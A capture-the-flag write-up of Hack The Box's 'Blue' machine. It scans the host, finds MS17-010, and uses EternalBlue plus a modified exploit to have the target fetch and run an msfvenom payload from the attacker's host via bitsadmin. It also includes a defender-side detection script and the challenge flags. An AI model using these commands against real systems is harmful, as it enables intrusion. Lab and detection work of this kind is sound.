HTB Blue Windows
Published on 25 Feb 2019
Easy machine: the EternalBlue exploit and Metasploit are all that is needed.
Recon
Nmap scan
nmap/Vulns_10.10.10.40.nmap 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up (0.044s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
Exploitation
The target machine is vulnerable to the infamous EternalBlue exploit (MS17-010).
First we use the Metasploit module auxiliary/scanner/smb/pipe_auditor
to find a valid named pipe that the exploit can use over SMB.
We download the EternalBlue Python exploit from worawit's MS17-010 repository
wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
We create our shell payload using msfvenom.
We modify the exploit so that it downloads our payload onto the target machine and executes it:
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
service_exec(conn, r'cmd /c bitsadmin /transfer pwn /download http://10.10.14.14/sc.exe C:\sc.exe')
service_exec(conn, r'cmd /c /sc.exe')
# Note: there are many methods to get a shell over an SMB admin session;
# a simple method to get a shell (but one easily detected by AV) is
# executing a binary generated by "msfvenom -f exe-service ..."
We run the exploit with the valid pipe name found earlier and our payload is executed.
Finally we have root level access.
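As an added defender-side example (not part of the original write-up), the following Python detection logic flags the two actions the modified exploit performs on the target: a cmd.exe spawned directly by the Service Control Manager (the service_exec step) and a bitsadmin /transfer download from an HTTP URL. The events it runs over are constructed Sysmon-style (Event ID 1, process creation) records, not real telemetry from the box.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 fields, simplified).
# These are made up for demonstration; only the command lines mirror the write-up.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c bitsadmin /transfer pwn /download http://10.10.14.14/sc.exe C:\sc.exe"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c /sc.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c dir C:\Users"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /list"},
]

# bitsadmin used as a downloader: /transfer job with an http(s) source URL
BITS_DOWNLOAD = re.compile(r"bitsadmin(?:\.exe)?\s+.*?/transfer\b.*?(https?://\S+)", re.IGNORECASE)
# cmd /c running an .exe dropped at a drive root (C:\sc.exe style)
ROOT_EXEC = re.compile(r"^cmd(?:\.exe)?\s+/c\s+[/\\][\w.-]+\.exe\b", re.IGNORECASE)


def classify(event):
    """Return the list of alert tags that apply to one process-creation event."""
    tags = []
    parent = event.get("ParentImage", "").lower()
    cmdline = event.get("CommandLine", "")
    m = BITS_DOWNLOAD.search(cmdline)
    if m:
        tags.append("bits_download:" + m.group(1))
    if ROOT_EXEC.search(cmdline):
        tags.append("exec_from_drive_root")
    # cmd.exe started directly by services.exe is the signature of a
    # psexec-style service_exec over an SMB admin session
    if parent.endswith("\\services.exe") and cmdline.lower().startswith("cmd"):
        tags.append("scm_spawned_cmd")
    return tags


def find_suspicious(events):
    """Return (command line, tags) for every event that raised at least one tag."""
    hits = []
    for e in events:
        tags = classify(e)
        if tags:
            hits.append((e["CommandLine"], tags))
    return hits


if __name__ == "__main__":
    for cmdline, tags in find_suspicious(SAMPLE_EVENTS):
        print(", ".join(tags), "<-", cmdline)
```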
Flags
ROOT "ff548eb71e920ff6c08843ce9df4e717"
USER "4c546aea7dbee75cbd71de245c8deea9"